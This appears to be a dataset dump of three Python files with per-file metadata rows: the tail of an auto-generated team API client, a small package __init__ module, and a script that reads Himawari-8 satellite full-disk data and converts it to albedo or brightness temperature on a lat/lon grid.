"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.show_team_with_http_info(team_id, **kwargs) # noqa: E501
else:
(data) = self.show_team_with_http_info(team_id, **kwargs) # noqa: E501
return data
def show_team_with_http_info(self, team_id, **kwargs): # noqa: E501
"""Fetch a specific team # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.show_team_with_http_info(team_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str team_id: A team UUID or slug (required)
:return: Team
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['team_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method show_team" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'team_id' is set
if ('team_id' not in local_var_params or
local_var_params['team_id'] is None):
raise ApiValueError("Missing the required parameter `team_id` when calling `show_team`") # noqa: E501
collection_formats = {}
path_params = {}
if 'team_id' in local_var_params:
path_params['team_id'] = local_var_params['team_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/teams/{team_id}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Team', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def update_team(self, team_id, team, **kwargs): # noqa: E501
"""Update a specific team # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_team(team_id, team, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str team_id: A team UUID or slug (required)
:param Team team: The team data to update (required)
:return: Team
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.update_team_with_http_info(team_id, team, **kwargs) # noqa: E501
else:
(data) = self.update_team_with_http_info(team_id, team, **kwargs) # noqa: E501
return data
def update_team_with_http_info(self, team_id, team, **kwargs): # noqa: E501
"""Update a specific team # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_team_with_http_info(team_id, team, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str team_id: A team UUID or slug (required)
:param Team team: The team data to update (required)
:return: Team
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['team_id', 'team'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method update_team" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'team_id' is set
if ('team_id' not in local_var_params or
local_var_params['team_id'] is None):
raise ApiValueError("Missing the required parameter `team_id` when calling `update_team`") # noqa: E501
# verify the required parameter 'team' is set
if ('team' not in local_var_params or
local_var_params['team'] is None):
raise ApiValueError("Missing the required parameter `team` when calling `update_team`") # noqa: E501
collection_formats = {}
path_params = {}
if 'team_id' in local_var_params:
path_params['team_id'] = local_var_params['team_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'team' in local_var_params:
body_params = local_var_params['team']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/teams/{team_id}', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Team', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
| 39.099138 | 128 | 0.613494 | 4,405 | 36,284 | 4.749149 | 0.036776 | 0.052772 | 0.080306 | 0.030975 | 0.96912 | 0.966061 | 0.96305 | 0.956023 | 0.952677 | 0.948757 | 0 | 0.015592 | 0.298286 | 36,284 | 927 | 129 | 39.141316 | 0.806056 | 0.300628 | 0 | 0.816206 | 1 | 0 | 0.170404 | 0.03353 | 0 | 0 | 0 | 0 | 0 | 1 | 0.037549 | false | 0 | 0.009881 | 0 | 0.102767 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
30b323a7587c1391bdabfbd9a30d3c6c9b4bc210 | 218 | py | Python | mupf/client/__init__.py | kimbar/mupf_project | 21de9ed94f604220f8b8dcc64d45e30a0b94d2a1 | [
"MIT"
] | null | null | null | mupf/client/__init__.py | kimbar/mupf_project | 21de9ed94f604220f8b8dcc64d45e30a0b94d2a1 | [
"MIT"
] | 44 | 2019-06-14T03:43:43.000Z | 2020-12-27T19:17:15.000Z | mupf/client/__init__.py | kimbar/mupf_project | 21de9ed94f604220f8b8dcc64d45e30a0b94d2a1 | [
"MIT"
] | null | null | null | from ._base import Client
from ._webbrowser import WebBrowser
from .._plugins_manager import inject, iterate_by_supclass
inject(__name__, globals(), iterate_by_supclass, class_=Client)
del iterate_by_supclass, inject
| 31.142857 | 63 | 0.83945 | 29 | 218 | 5.793103 | 0.517241 | 0.160714 | 0.303571 | 0.27381 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.09633 | 218 | 6 | 64 | 36.333333 | 0.852792 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.6 | 0 | 0.6 | 0 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
30c4a533ac2d47e45adbdaa9b0b84786cfb5fd43 | 35,545 | py | Python | readahi8fulldisk_vis.py | YuchenGUOGYC/Himawari-8_data_process | dd3c57ca15c53bdcc21f590fdadce6bd2bb840da | [
"MIT"
] | null | null | null | readahi8fulldisk_vis.py | YuchenGUOGYC/Himawari-8_data_process | dd3c57ca15c53bdcc21f590fdadce6bd2bb840da | [
"MIT"
] | null | null | null | readahi8fulldisk_vis.py | YuchenGUOGYC/Himawari-8_data_process | dd3c57ca15c53bdcc21f590fdadce6bd2bb840da | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Created on Thu Jul 9 09:31:28 2020
@author: guoyuchen
@e-mail:guoyc1994@163.com
@tel: 15801369263
"""
import numpy as np
def read_Himawari(inputfile):
resolution=int(inputfile[-12])
if resolution==1:
res=12100000
nlin=1100
ncol=11000
elif resolution==2:
res=3025000
nlin=550
ncol=5500
else:
res=48400000
nlin=2200
ncol=22000
band=int(inputfile[-21:-19])
if band < 7:
formation = [('Block number1', 'i1', 1), \
('Block length1', 'i2', 1), \
('Total number of header blocks ', 'i2', 1), \
('Byte order', 'i1', 1), \
('Satellite name', 'S1', 16), \
('Processing center name', 'S1', 16), \
('Observation area', 'S1', 4), \
('Other observation information', 'S1', 2), \
('Observation timeline', 'i2', 1), \
('Observation start time', 'float64', 1), \
('Observation end time', 'float64', 1), \
('File creation time', 'float64', 1), \
('Total header length', 'i4', 1), \
('Total data length', 'i4', 1), \
('Quality flag 1', 'i1', 1), \
('Quality flag 2 ', 'i1', 1), \
('Quality flag 3', 'i1', 1), \
('Quality flag 4', 'i1', 1), \
('File format version', 'S1', 32), \
('File name ', 'S1', 128), \
('Spare1', 'S1', 40), \
('Block number2', 'i1', 1), \
('Block length2', 'i2', 1), \
('Number of bits per pixel', 'i2', 1), \
('Number of columns', 'i2', 1), \
('Number of lines', 'i2', 1), \
('Compression flag for data', 'i1', 1), \
('Spare2', 'S1', 40), \
('Block number3', 'i1', 1), \
('Block length3', 'i2', 1), \
('sub_lon', 'float64', 1), \
('Column scaling factor', 'i4', 1), \
('Line scaling factor', 'i4', 1), \
('Column offset', 'float32', 1), \
('Line offset', 'float32', 1), \
('Distance from Earth’s center to virtual satellite', 'float64', 1), \
('Earth’s equatorial radius', 'float64', 1), \
('Earth’s polar radius', 'float64', 1), \
('var1', 'float64', 1), \
('var2', 'float64', 1), \
('var3', 'float64', 1), \
('Coefficient for sd', 'float64', 1), \
('Resampling types', 'i2', 1), \
('Resampling size', 'i2', 1), \
('Spare3', 'S1', 40), \
('Block number4', 'i1', 1), \
('Block length4', 'i2', 1), \
('Navigation information time', 'float64', 1), \
('SSP longitude', 'float64', 1), \
('SSP latitude', 'float64', 1), \
('Distance from Earth’s center to Satellite', 'float64', 1), \
('Nadir longitude', 'float64', 1), \
('Nadir latitude', 'float64', 1), \
('Sun’s position', 'float64', 3), \
('Moon’s position', 'float64', 3), \
('Spare4', 'S1', 40), \
('Block number5', 'i1', 1), \
('Block length5', 'i2', 1), \
('Band number', 'i2', 1), \
('Central wave length', 'float64', 1), \
('Valid number of bits per pixel', 'i2', 1), \
('Count value of error pixels', 'uint16', 1), \
('Count value of pixels outside scan area', 'uint16', 1), \
('Slope for count-radiance conversion equation ', 'float64', 1), \
('Intercept for count-radiance conversion equation', 'float64', 1), \
('Coefficient for transformation from radiance to albedo', 'float64', 1), \
('Update time of the values of the following No. 12 and No. 13', 'float64', 1), \
('Calibrated Slope for count-radiance conversion equation_updated value of No. 8 of this block ', 'float64', 1),\
('Calibrated Intercept for count-radiance conversion equation_updated value of No. 9 of this block ', 'float64', 1),\
('Spare5', 'S1', 80), \
('Block number6', 'i1', 1), \
('Block length6', 'i2', 1), \
('GSICS calibration coefficient_Intercept', 'float64', 1), \
('GSICS calibration coefficient_Slope', 'float64', 1), \
('GSICS calibration coefficient_Quadratic term', 'float64', 1), \
('Radiance bias for standard scene', 'float64', 1), \
('Uncertainty of radiance bias for standard scene', 'float64', 1), \
('Radiance for standard scene', 'float64', 1), \
('Start time of GSICS Correction validity period', 'float64', 1), \
('End time of GSICS Correction validity period', 'float64', 1), \
('Radiance validity range of GSICS calibration coefficients_upper limit', 'float32', 1), \
('Radiance validity range of GSICS calibration coefficients_lower limit', 'float32', 1), \
('File name of GSICS Correction', 'S1', 128), \
('Spare6', 'S1', 56), \
('Block number7', 'i1', 1), \
('Block length7', 'i2', 1), \
('Total number of segments', 'i1', 1), \
('Segment sequence number', 'i1', 1), \
('First line number of image segment', 'i2', 1), \
('Spare7', 'S1', 40), \
('Block number8', 'i1', 1), \
('Block length8', 'i2', 1), \
('Center column of rotation', 'float32', 1), \
('Center line of rotation', 'float32', 1), \
('Amount of rotational correction', 'float64', 1), \
('Number of correction information data for column and line direction', 'i2', 1), \
('Line number after rotation', 'i2', 1), \
('Shift amount for column direction', 'float32', 1), \
('Shift amount for line direction8', 'float32', 1), \
('Spare8', 'S1', 50), \
('Block number9', 'i1', 1), \
('Block length9', 'i2', 1), \
('Number of observation times9', 'i2', 1), \
('Line number9', 'i2', 1), \
('Observation time9', 'float64', 1), \
('Spare9', 'S1', 70), \
('Block number10', 'i1', 1), \
('Block length10', 'i4', 1), \
('Number of error information data', 'i2', 1), \
('Line number10', 'i2', 1), \
('Number of error pixels per line10', 'i2', 1), \
('Spare10', 'S1', 36), \
('Block number11', 'i1', 1), \
('Block length11', 'i2', 1), \
('Spare11', 'S1', 256), \
('Count value of each pixel', 'i2', res)]
else:
formation=[('Block number1','i1',1),\
('Block length1','i2',1),\
('Total number of header blocks ','i2',1),\
('Byte order','i1',1),\
('Satellite name','S1',16),\
('Processing center name','S1',16),\
('Observation area','S1',4),\
('Other observation information','S1',2),\
('Observation timeline','i2',1),\
('Observation start time','float64',1),\
('Observation end time','float64',1),\
('File creation time','float64',1),\
('Total header length','i4',1),\
('Total data length','i4',1),\
('Quality flag 1','i1',1),\
('Quality flag 2 ','i1',1),\
('Quality flag 3','i1',1),\
('Quality flag 4','i1',1),\
('File format version','S1',32),\
('File name ','S1',128),\
('Spare1','S1',40),\
('Block number2','i1',1),\
('Block length2','i2',1),\
('Number of bits per pixel','i2',1),\
('Number of columns','i2',1),\
('Number of lines','i2',1),\
('Compression flag for data','i1',1),\
('Spare2','S1',40),\
('Block number3','i1',1),\
('Block length3','i2',1),\
('sub_lon','float64',1),\
('Column scaling factor','i4',1),\
('Line scaling factor','i4',1),\
('Column offset','float32',1),\
('Line offset','float32',1),\
('Distance from Earth’s center to virtual satellite','float64',1),\
('Earth’s equatorial radius','float64',1),\
('Earth’s polar radius','float64',1),\
('var1','float64',1),\
('var2','float64',1),\
('var3','float64',1),\
('Coefficient for sd','float64',1),\
('Resampling types','i2',1),\
('Resampling size','i2',1),\
('Spare3','S1',40),\
('Block number4','i1',1),\
('Block length4','i2',1),\
('Navigation information time','float64',1),\
('SSP longitude','float64',1),\
('SSP latitude','float64',1),\
('Distance from Earth’s center to Satellite','float64',1),\
('Nadir longitude','float64',1),\
('Nadir latitude','float64',1),\
('Sun’s position','float64',3),\
('Moon’s position','float64',3),\
('Spare4','S1',40),\
('Block number5','i1',1),\
('Block length5','i2',1),\
('Band number','i2',1),\
('Central wave length','float64',1),\
('Valid number of bits per pixel','i2',1),\
('Count value of error pixels','i2',1),\
('Count value of pixels outside scan area','i2',1),\
('Slope for count-radiance conversion equation ','float64',1),\
('Intercept for count-radiance conversion equation','float64',1),\
('radiance to brightness temperature_c0','float64',1),\
('radiance to brightness temperature_c1','float64',1),\
('radiance to brightness temperature_c2','float64',1),\
('brightness temperature to radiance_C0','float64',1),\
('brightness temperature to radianceC1','float64',1),\
('brightness temperature to radianceC2','float64',1),\
('Speed of light','float64',1),\
('Planck constant','float64',1),\
('Boltzmann constant','float64',1),\
('Spare5','S1',40), \
('Block number6', 'i1', 1), \
('Block length6', 'i2', 1), \
('GSICS calibration coefficient_Intercept', 'float64', 1), \
('GSICS calibration coefficient_Slope', 'float64', 1), \
('GSICS calibration coefficient_Quadratic term', 'float64', 1), \
('Radiance bias for standard scene', 'float64', 1), \
('Uncertainty of radiance bias for standard scene', 'float64', 1), \
('Radiance for standard scene', 'float64', 1), \
('Start time of GSICS Correction validity period', 'float64', 1), \
('End time of GSICS Correction validity period', 'float64', 1), \
('Radiance validity range of GSICS calibration coefficients_upper limit', 'float32', 1), \
('Radiance validity range of GSICS calibration coefficients_lower limit', 'float32', 1), \
('File name of GSICS Correction', 'S1', 128), \
('Spare6', 'S1', 56), \
('Block number7', 'i1', 1), \
('Block length7', 'i2', 1), \
('Total number of segments', 'i1', 1), \
('Segment sequence number', 'i1', 1), \
('First line number of image segment', 'i2', 1), \
('Spare7', 'S1', 40), \
('Block number8', 'i1', 1), \
('Block length8', 'i2', 1), \
('Center column of rotation', 'float32', 1), \
('Center line of rotation', 'float32', 1), \
('Amount of rotational correction', 'float64', 1), \
('Number of correction information data for column and line direction', 'i2', 1), \
('Line number after rotation', 'i2', 1), \
('Shift amount for column direction', 'float32', 1), \
('Shift amount for line direction8', 'float32', 1), \
('Spare8', 'S1', 50), \
('Block number9', 'i1', 1), \
('Block length9', 'i2', 1), \
('Number of observation times9', 'i2', 1), \
('Line number9', 'i2', 1), \
('Observation time9', 'float64', 1), \
('Spare9', 'S1', 70), \
('Block number10', 'i1', 1), \
('Block length10', 'i4', 1), \
('Number of error information data', 'i2', 1), \
('Line number10', 'i2', 1), \
('Number of error pixels per line10', 'i2', 1), \
('Spare10', 'S1', 36), \
('Block number11', 'i1', 1), \
('Block length11', 'i2', 1), \
('Spare11', 'S1', 256), \
('Count value of each pixel', 'i2', res)]
data=np.fromfile(inputfile,dtype=formation)
band=data['Count value of each pixel'].reshape(nlin,ncol)
return band
def read_Himawari_info(inputfile):
resolution=int(inputfile[-12])
if resolution==1:
res=12100000
elif resolution==2:
res=3025000
else:
res=48400000
band=int(inputfile[-21:-19])
if band < 7:
formation = [('Block number1', 'i1', 1), \
('Block length1', 'i2', 1), \
('Total number of header blocks ', 'i2', 1), \
('Byte order', 'i1', 1), \
('Satellite name', 'S1', 16), \
('Processing center name', 'S1', 16), \
('Observation area', 'S1', 4), \
('Other observation information', 'S1', 2), \
('Observation timeline', 'i2', 1), \
('Observation start time', 'float64', 1), \
('Observation end time', 'float64', 1), \
('File creation time', 'float64', 1), \
('Total header length', 'i4', 1), \
('Total data length', 'i4', 1), \
('Quality flag 1', 'i1', 1), \
('Quality flag 2 ', 'i1', 1), \
('Quality flag 3', 'i1', 1), \
('Quality flag 4', 'i1', 1), \
('File format version', 'S1', 32), \
('File name ', 'S1', 128), \
('Spare1', 'S1', 40), \
('Block number2', 'i1', 1), \
('Block length2', 'i2', 1), \
('Number of bits per pixel', 'i2', 1), \
('Number of columns', 'i2', 1), \
('Number of lines', 'i2', 1), \
('Compression flag for data', 'i1', 1), \
('Spare2', 'S1', 40), \
('Block number3', 'i1', 1), \
('Block length3', 'i2', 1), \
('sub_lon', 'float64', 1), \
('Column scaling factor', 'i4', 1), \
('Line scaling factor', 'i4', 1), \
('Column offset', 'float32', 1), \
('Line offset', 'float32', 1), \
('Distance from Earth’s center to virtual satellite', 'float64', 1), \
('Earth’s equatorial radius', 'float64', 1), \
('Earth’s polar radius', 'float64', 1), \
('var1', 'float64', 1), \
('var2', 'float64', 1), \
('var3', 'float64', 1), \
('Coefficient for sd', 'float64', 1), \
('Resampling types', 'i2', 1), \
('Resampling size', 'i2', 1), \
('Spare3', 'S1', 40), \
('Block number4', 'i1', 1), \
('Block length4', 'i2', 1), \
('Navigation information time', 'float64', 1), \
('SSP longitude', 'float64', 1), \
('SSP latitude', 'float64', 1), \
('Distance from Earth’s center to Satellite', 'float64', 1), \
('Nadir longitude', 'float64', 1), \
('Nadir latitude', 'float64', 1), \
('Sun’s position', 'float64', 3), \
('Moon’s position', 'float64', 3), \
('Spare4', 'S1', 40), \
('Block number5', 'i1', 1), \
('Block length5', 'i2', 1), \
('Band number', 'i2', 1), \
('Central wave length', 'float64', 1), \
('Valid number of bits per pixel', 'i2', 1), \
('Count value of error pixels', 'uint16', 1), \
('Count value of pixels outside scan area', 'uint16', 1), \
('Slope for count-radiance conversion equation ', 'float64', 1), \
('Intercept for count-radiance conversion equation', 'float64', 1), \
('Coefficient for transformation from radiance to albedo', 'float64', 1), \
('Update time of the values of the following No. 12 and No. 13', 'float64', 1), \
('Calibrated Slope for count-radiance conversion equation_updated value of No. 8 of this block ', 'float64', 1),\
('Calibrated Intercept for count-radiance conversion equation_updated value of No. 9 of this block ', 'float64', 1),\
('Spare5', 'S1', 80), \
('Block number6', 'i1', 1), \
('Block length6', 'i2', 1), \
('GSICS calibration coefficient_Intercept', 'float64', 1), \
('GSICS calibration coefficient_Slope', 'float64', 1), \
('GSICS calibration coefficient_Quadratic term', 'float64', 1), \
('Radiance bias for standard scene', 'float64', 1), \
('Uncertainty of radiance bias for standard scene', 'float64', 1), \
('Radiance for standard scene', 'float64', 1), \
('Start time of GSICS Correction validity period', 'float64', 1), \
('End time of GSICS Correction validity period', 'float64', 1), \
('Radiance validity range of GSICS calibration coefficients_upper limit', 'float32', 1), \
('Radiance validity range of GSICS calibration coefficients_lower limit', 'float32', 1), \
('File name of GSICS Correction', 'S1', 128), \
('Spare6', 'S1', 56), \
('Block number7', 'i1', 1), \
('Block length7', 'i2', 1), \
('Total number of segments', 'i1', 1), \
('Segment sequence number', 'i1', 1), \
('First line number of image segment', 'i2', 1), \
('Spare7', 'S1', 40), \
('Block number8', 'i1', 1), \
('Block length8', 'i2', 1), \
('Center column of rotation', 'float32', 1), \
('Center line of rotation', 'float32', 1), \
('Amount of rotational correction', 'float64', 1), \
('Number of correction information data for column and line direction', 'i2', 1), \
('Line number after rotation', 'i2', 1), \
('Shift amount for column direction', 'float32', 1), \
('Shift amount for line direction8', 'float32', 1), \
('Spare8', 'S1', 50), \
('Block number9', 'i1', 1), \
('Block length9', 'i2', 1), \
('Number of observation times9', 'i2', 1), \
('Line number9', 'i2', 1), \
('Observation time9', 'float64', 1), \
('Spare9', 'S1', 70), \
('Block number10', 'i1', 1), \
('Block length10', 'i4', 1), \
('Number of error information data', 'i2', 1), \
('Line number10', 'i2', 1), \
('Number of error pixels per line10', 'i2', 1), \
('Spare10', 'S1', 36), \
('Block number11', 'i1', 1), \
('Block length11', 'i2', 1), \
('Spare11', 'S1', 256), \
('Count value of each pixel', 'i2', res)]
else:
formation=[('Block number1','i1',1),\
('Block length1','i2',1),\
('Total number of header blocks ','i2',1),\
('Byte order','i1',1),\
('Satellite name','S1',16),\
('Processing center name','S1',16),\
('Observation area','S1',4),\
('Other observation information','S1',2),\
('Observation timeline','i2',1),\
('Observation start time','float64',1),\
('Observation end time','float64',1),\
('File creation time','float64',1),\
('Total header length','i4',1),\
('Total data length','i4',1),\
('Quality flag 1','i1',1),\
('Quality flag 2 ','i1',1),\
('Quality flag 3','i1',1),\
('Quality flag 4','i1',1),\
('File format version','S1',32),\
('File name ','S1',128),\
('Spare1','S1',40),\
('Block number2','i1',1),\
('Block length2','i2',1),\
('Number of bits per pixel','i2',1),\
('Number of columns','i2',1),\
('Number of lines','i2',1),\
('Compression flag for data','i1',1),\
('Spare2','S1',40),\
('Block number3','i1',1),\
('Block length3','i2',1),\
('sub_lon','float64',1),\
('Column scaling factor','i4',1),\
('Line scaling factor','i4',1),\
('Column offset','float32',1),\
('Line offset','float32',1),\
('Distance from Earth’s center to virtual satellite','float64',1),\
('Earth’s equatorial radius','float64',1),\
('Earth’s polar radius','float64',1),\
('var1','float64',1),\
('var2','float64',1),\
('var3','float64',1),\
('Coefficient for sd','float64',1),\
('Resampling types','i2',1),\
('Resampling size','i2',1),\
('Spare3','S1',40),\
('Block number4','i1',1),\
('Block length4','i2',1),\
('Navigation information time','float64',1),\
('SSP longitude','float64',1),\
('SSP latitude','float64',1),\
('Distance from Earth’s center to Satellite','float64',1),\
('Nadir longitude','float64',1),\
('Nadir latitude','float64',1),\
('Sun’s position','float64',3),\
('Moon’s position','float64',3),\
('Spare4','S1',40),\
('Block number5','i1',1),\
('Block length5','i2',1),\
('Band number','i2',1),\
('Central wave length','float64',1),\
('Valid number of bits per pixel','i2',1),\
('Count value of error pixels','i2',1),\
('Count value of pixels outside scan area','i2',1),\
('Slope for count-radiance conversion equation ','float64',1),\
('Intercept for count-radiance conversion equation','float64',1),\
('radiance to brightness temperature_c0','float64',1),\
('radiance to brightness temperature_c1','float64',1),\
('radiance to brightness temperature_c2','float64',1),\
('brightness temperature to radiance_C0','float64',1),\
('brightness temperature to radianceC1','float64',1),\
('brightness temperature to radianceC2','float64',1),\
('Speed of light','float64',1),\
('Planck constant','float64',1),\
('Boltzmann constant','float64',1),\
('Spare5','S1',40), \
('Block number6', 'i1', 1), \
('Block length6', 'i2', 1), \
('GSICS calibration coefficient_Intercept', 'float64', 1), \
('GSICS calibration coefficient_Slope', 'float64', 1), \
('GSICS calibration coefficient_Quadratic term', 'float64', 1), \
('Radiance bias for standard scene', 'float64', 1), \
('Uncertainty of radiance bias for standard scene', 'float64', 1), \
('Radiance for standard scene', 'float64', 1), \
('Start time of GSICS Correction validity period', 'float64', 1), \
('End time of GSICS Correction validity period', 'float64', 1), \
('Radiance validity range of GSICS calibration coefficients_upper limit', 'float32', 1), \
('Radiance validity range of GSICS calibration coefficients_lower limit', 'float32', 1), \
('File name of GSICS Correction', 'S1', 128), \
('Spare6', 'S1', 56), \
('Block number7', 'i1', 1), \
('Block length7', 'i2', 1), \
('Total number of segments', 'i1', 1), \
('Segment sequence number', 'i1', 1), \
('First line number of image segment', 'i2', 1), \
('Spare7', 'S1', 40), \
('Block number8', 'i1', 1), \
('Block length8', 'i2', 1), \
('Center column of rotation', 'float32', 1), \
('Center line of rotation', 'float32', 1), \
('Amount of rotational correction', 'float64', 1), \
('Number of correction information data for column and line direction', 'i2', 1), \
('Line number after rotation', 'i2', 1), \
('Shift amount for column direction', 'float32', 1), \
('Shift amount for line direction8', 'float32', 1), \
('Spare8', 'S1', 50), \
('Block number9', 'i1', 1), \
('Block length9', 'i2', 1), \
('Number of observation times9', 'i2', 1), \
('Line number9', 'i2', 1), \
('Observation time9', 'float64', 1), \
('Spare9', 'S1', 70), \
('Block number10', 'i1', 1), \
('Block length10', 'i4', 1), \
('Number of error information data', 'i2', 1), \
('Line number10', 'i2', 1), \
('Number of error pixels per line10', 'i2', 1), \
('Spare10', 'S1', 36), \
('Block number11', 'i1', 1), \
('Block length11', 'i2', 1), \
('Spare11', 'S1', 256), \
('Count value of each pixel', 'i2', res)]
data=np.fromfile(inputfile,dtype=formation)
return data
def latlon2idx(lon,lat,B,A,H,pi,STAR_POINT_LON,COFF,CFAC):
ANG = np.pi / 180
lon = np.array(lon)
lat = np.array(lat)
lon = lon * ANG
lat = lat * ANG
f = np.arctan(np.tan(lat) * (A * A) / (B * B))
re = B / (np.sqrt(1 - (np.cos(f) * np.cos(f)) * (A * A - B * B) / (A * A)))
r1 = H - re * np.cos(f) * np.cos(lon - (STAR_POINT_LON * ANG))
r2 = 0 - re * np.cos(f) * np.sin(lon - (STAR_POINT_LON * ANG))
r3 = re * np.sin(f)
rn = np.sqrt(r1 * r1 + r2 * r2 + r3 * r3)
x = np.arctan(0 - r2 / r1) * 180 / np.pi
y = np.arcsin(0 - r3 / rn) * 180 / np.pi
col = (COFF + x * CFAC / 2**16).astype(int)
row = (COFF + y * CFAC / 2**16).astype(int)
return col, row
def mergeAHI8(un_path,time,bd,res):
DATA = {}
for i in np.arange(1,11,1):
inputfile = un_path+'/HS_H08_'+time+'_'+bd+'_FLDK_'+res+'_S{:02d}10.DAT'.format(i)
data = read_Himawari(inputfile)
DATA[i] = data
BAND = np.vstack((DATA[1],DATA[2],DATA[3],DATA[4],DATA[5],DATA[6],DATA[7],DATA[8],DATA[9],DATA[10])).astype(int)
return BAND,inputfile
def bandextraction(un_path,time,bd,res):
band,inputfile = mergeAHI8(un_path,time,bd,res)
info = read_Himawari_info(inputfile)
BAND = ToALBEDOorBT(band,info)
band_ccl,longitude,latitude = fulldisktoCCL(BAND,info)
return band_ccl,longitude,latitude
def ToALBEDOorBT(BAND,info):
index = np.where(BAND>0)
indexunvalid = np.where(BAND<=0)
rad = BAND
Slop = float(info['Slope for count-radiance conversion equation '][0])
Int = float(info['Intercept for count-radiance conversion equation'][0])
if int(bd[1:])<7:
c = float(info['Coefficient for transformation from radiance to albedo'])
BAND = (BAND*Slop+Int)*c
BAND[indexunvalid] = -2
else:
h = float(info['Planck constant'][0])
c = float(info['Speed of light'][0])
k = float(info['Boltzmann constant'][0])
wv = float(info['Central wave length'][0])* 1e-6
c0 = float(info['radiance to brightness temperature_c0'][0])
c1 = float(info['radiance to brightness temperature_c1'][0])
c2 = float(info['radiance to brightness temperature_c2'][0])
rad = (rad*Slop+Int)*1e6
Te = h*c/((k*wv)*(np.log(2*h*c*c/((wv**5)*rad)+1)))
BT = c0 + c1 * Te + c2 * Te * Te
BAND[index] = BT
return BAND
def fulldisktoCCL(BAND,info):
B = float(info['Earth’s equatorial radius'][0])
#地球短半轴KM
A = float(info['Earth’s polar radius'][0])
#卫星到质心的距离KM
H = float(info['Distance from Earth’s center to virtual satellite'][0])
#pi
pi = np.pi
#星下点所在经度
STAR_POINT_LON = 140.7
#2KM偏移量
COFF = float(info['Column offset'][0])
#2KM偏移因子
CFAC = float(info['Column scaling factor'][0])
longitude = np.arange(73-1,135+70-22-1,0.02)
latitude = np.arange(55,-55,-0.02)
lon,lat = np.meshgrid(longitude,latitude)
col,row = latlon2idx(lon,lat,B,A,H,pi,STAR_POINT_LON,COFF,CFAC)
#####
band_ccl = np.zeros(lon.shape)
band_ccl = BAND[row,col]
return band_ccl,longitude,latitude
time = '20200701_0800'
un_path="C://Users/guoyuchen/Desktop/fulldisk/output/"
bandlist = ['B03']#,'B02']#['B03','B04','B05','B06','B07','B08','B09','B10','B11','B12','B13','B14','B15','B16']
reslist = ['R10']#,'R20','R05']
bd = 'B01'
#ALLBAND = {}
#for bd in bandlist:
# band_ccl,longitude,latitude = bandextraction(un_path,time,bd,'R05')
# ALLBAND[bd] = band_ccl
res = reslist[0]
DATA = {}
for i in np.arange(1,11,1):
inputfile = un_path+'/HS_H08_'+time+'_'+bd+'_FLDK_'+res+'_S{:02d}10.DAT'.format(i)
data = read_Himawari(inputfile)
DATA[i] = data
BAND = np.vstack((DATA[1],DATA[2],DATA[3],DATA[4],DATA[5],DATA[6],DATA[7],DATA[8],DATA[9],DATA[10])).astype(int)
info = read_Himawari_info(inputfile)
BAND = ToALBEDOorBT(BAND,info)
band_ccl,longitude,latitude = fulldisktoCCL(BAND,info)
'''
img = np.zeros((5500,5500,3))
img[:,:,0] = np.clip(ALLBAND['B01'],0,1)
img[:,:,1] = np.clip(ALLBAND['B02'],0,1)
img[:,:,2] = np.clip(ALLBAND['B01'],0,1)
'''
